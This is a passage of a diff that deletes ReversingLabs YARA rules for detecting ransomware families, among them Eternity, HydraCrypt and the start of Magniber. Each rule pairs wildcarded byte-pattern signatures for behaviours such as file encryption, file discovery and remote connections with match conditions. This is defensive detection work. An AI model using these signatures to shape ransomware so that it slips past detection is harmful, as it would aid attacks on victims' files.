-            ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 11 ?? 11 ?? 8E 69 58 13 ?? 11 ?? 17 58 13
-            ?? 11 ?? 11 ?? 3F ?? ?? ?? ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 16 07 09 28 ?? ?? ?? ??
-            11 ?? 8E 69 28 ?? ?? ?? ?? 2B ?? 11 ?? 16 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ??
-            ?? ?? DE ?? 26 DE ?? 26 DE ?? 00 07 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 00 06 28 ?? ?? ??
-            ?? 26 DE ?? 26 DE ?? DC 2A
-        }
-		$find_files = {
-            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 2C ?? 2A 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 14 0B 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B DE ?? 26
-            DE ?? 07 2C ?? 07 8E 16 FE 01 2B ?? 17 0C 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13
-            ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 08 2C ?? 11 ?? 7B ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ??
-            26 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 08 2C ?? DD ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17
-            6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 07 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ??
-            ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
-            7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? ?? ?? ?? 11 ?? FE 06 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 11 ?? 7B ?? ?? ?? ?? 09 28 ?? ?? ?? ?? DE
-            ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 09 6F ?? ?? ?? ?? DE ?? 26 DE
-            ?? DE ?? 26 DE ?? 2A
-        }
-		$change_boot = {
-            02 8E 2C ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 28 ??
-            ?? ?? ?? 2A 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 28 ?? ?? ?? ?? 2A
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $change_boot ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
-}
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Eternity : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Eternity ransomware."
-		author = "ReversingLabs"
-		id = "7bb0f3b0-a8c0-5239-a1b4-532d403f59bc"
-		date = "2022-07-22"
-		modified = "2022-07-22"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara#L1-L74"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a2298a26e9bbe2b779eb2afeeda28d4321bc2d26db46bbb377bf86abaf8fa929"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Eternity"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files = {
-            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08
-            6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F
-            ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13
-            ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
-            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ??
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58
-            13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02
-            28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ??
-            ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ??
-            08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F
-            ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A
-        }
-		$aes_encrypt = {
-            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
-            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
-            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
-            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
-        }
-		$encrypt_pass = {
-            72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C
-            08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ??
-            16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $aes_encrypt ) and ( $encrypt_pass )
-}
-rule REVERSINGLABS_Win32_Ransomware_Hydracrypt : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects HydraCrypt ransomware."
-		author = "ReversingLabs"
-		id = "2e780f7c-8d6d-51c8-b65e-330cc3b17bb7"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HydraCrypt.yara#L1-L174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "910a6f23f06cecb8d3115ebfed42a66412dbd0d3a519e39f21df81b0c2028f48"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HydraCrypt"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 83 EC ?? 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 BE ?? ?? ?? ?? 56
-            33 DB 53 53 6A ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ??
-            59 59 53 53 6A ?? 53 53 6A ?? FF 75 ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 56 53 53 68 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? FF D0 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
-            ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            BF ?? ?? ?? ?? 57 89 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 56 50 57 FF 75 ?? E8 ?? ?? ?? ??
-            83 C4 ?? 5F 39 5D ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 39 5D ?? 74 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 59 39 5D ?? 5E 5B 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 C9 C3
-        }
-		$remote_connection_2 = {
-            55 8B EC 83 EC ?? 53 56 57 6A ?? 59 68 ?? ?? ?? ?? 33 DB BE ?? ?? ?? ?? 8D 7D ?? 6A
-            ?? 89 5D ?? F3 A5 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 53 8D 4D ?? 51 FF D0 8B
-            F8 3B FB 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 68
-            ?? ?? ?? ?? 53 53 FF 75 ?? 57 FF D0 8B F0 3B F3 75 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 68
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 59 59 8D 4D ?? 51 6A ?? 8D 4D ?? 51 56 FF D0 39 5D ?? 75 ?? 57 E8 ??
-            ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 40 EB ?? 68 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 4D ?? 51 FF D0 33 C9 3B C8 1B C0
-            F7 D8 5F 5E 5B C9 C3
-        }
-		$remote_connection_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
-            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 56 53 FF D0 56
-            50 89 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF D0 BF ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ??
-            ?? 59 59 85 DB 7E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 8B C3 6A ?? 99 59
-            F7 F9 85 D2 75 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B 45 ?? 0F B6 04 03
-            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 43 3B DE 7C ?? E8 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 50 56 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 83 C4 ?? 83 7D ?? ?? BB ?? ?? ?? ?? BE ?? ?? ??
-            ?? 75 ?? 53 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
-            75 ?? 53 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F
-            5E 5B C9 C3
-        }
-		$encrypt_files_1 = {
-            8A 45 ?? 04 ?? 66 98 66 89 45 ?? 0F B7 C0 50 8D 45 ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 FF D0 8B F0 83 FE ?? 74 ?? 83
-            FE ?? 74 ?? 83 FE ?? 75 ?? FF 75 ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 57 6A ?? E8 ?? ?? ??
-            ?? 59 59 68 ?? ?? ?? ?? FF D0 FF 45 ?? 83 7D ?? ?? 0F 8C ?? ?? ?? ?? 83 3D ?? ?? ??
-            ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE
-            ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8
-            ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ??
-            75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 56 6A
-            ?? E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 53 53 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 53 FF D0 57 6A ?? E8 ?? ?? ??
-            ?? 59 59 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 5F
-            5E 33 C0 5B C9 C2
-        }
-		$encrypt_files_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
-            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 89
-            45 ?? 8D 45 ?? 50 66 A5 E8 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 66 A5 BE
-            ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 53 89 45 ?? 8D 45 ?? 53 50 66 A5 E8 ?? ?? ?? ?? 59 50
-            E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 BF ??
-            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 55 ?? 68 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ??
-            6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 FF D0 8B F0 53 56 E8 ?? ?? ?? ?? 59
-            59 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
-            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-        }
-		$encrypt_files_3 = {
-            D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? BE ?? ?? ??
-            ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? FF D0 56 E8 ?? ??
-            ?? ?? 59 3C ?? 75 ?? BE ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D0
-            E8 ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            D0 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 68 ?? ?? ?? ?? 57 8D 85 ?? ??
-            ?? ?? 50 BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 57 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 68 ?? ?? ??
-            ?? 6A ?? 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 6A ?? FF 75 ?? A3 ?? ?? ?? ?? FF 55
-            ?? 6A ?? FF 75 ?? 8B F0 FF 55 ?? FF 75 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? 50 FF
-        }
-		$encrypt_files_4 = {
-            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 85 C0 75 ?? 33 C0 40 E9 ?? ?? ?? ?? 8B 3D
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8B C8 8B 45 ?? 53 57 99 53 53
-            2B C2 68 ?? ?? ?? ?? D1 F8 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B C6 99 2B C2 D1 F8 2D
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 53 FF D1 A3 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0
-            BE ?? ?? ?? ?? 85 C0 75 ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53
-            53 FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 53 FF D0 39 1D ??
-            ?? ?? ?? 75 ?? 6A ?? 58 EB ?? 6A ?? 59 33 C0 68 ?? ?? ?? ?? 89 5D ?? 8D 7D ?? 6A ??
-            F3 AB E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 EB ?? 83 F8 ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? E8
-            ?? ?? ?? ?? 59 59 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8D 4D
-            ?? 51 FF D0 6A ?? 59 8D 75 ?? BF ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ??
-            ?? 59 59 53 53 53 8D 4D ?? 51 FF D0 3B C3 75 ?? 8B 45 ?? 5F 5E 5B C9 C2 ?? ?? 6A ??
-            E9
-        }
-		$remote_connection_4 = {
-            55 8B EC 51 51 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 33 F6 56 56 56 6A ??
-            68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 8B D8 E8 ?? ?? ?? ?? 59 59 56 56 6A ?? 56
-            56 6A ?? FF 75 ?? 53 FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 68
-            ?? ?? ?? ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF D0 68 ?? ?? ??
-            ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 56 56 56 FF 75 ?? FF D0 53 E8 ?? ?? ?? ??
-            FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B C9 C3
-        }
-		$remote_connection_5 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 FF 68 ?? ?? ?? ?? 47 57 E8 ?? ?? ?? ?? 59 59
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
-            FF D0 56 57 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 56 57 E8
-            ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8
-            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 BE ?? ?? ?? ?? 85 C0 74 ?? 56 57
-            E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 57
-            6A ?? FF D0 8B D8 85 DB 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ??
-            51 FF D0 6A ?? 58 66 89 45 ?? 8B 46 ?? 8B 00 8B 00 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 66
-            89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? 51 FF D0 6A ?? 50 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 53 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? FF D0 5F 5E 5B C9 C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $encrypt_files_1 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3 ) or ( $encrypt_files_2 and $encrypt_files_3 and $encrypt_files_4 and $remote_connection_4 and $remote_connection_5 ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Magniber : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Magniber ransomware."
-		author = "ReversingLabs"
-		id = "07b6c938-aa25-5ff6-95d2-9e0f84c41b41"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Magniber.yara#L1-L114"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
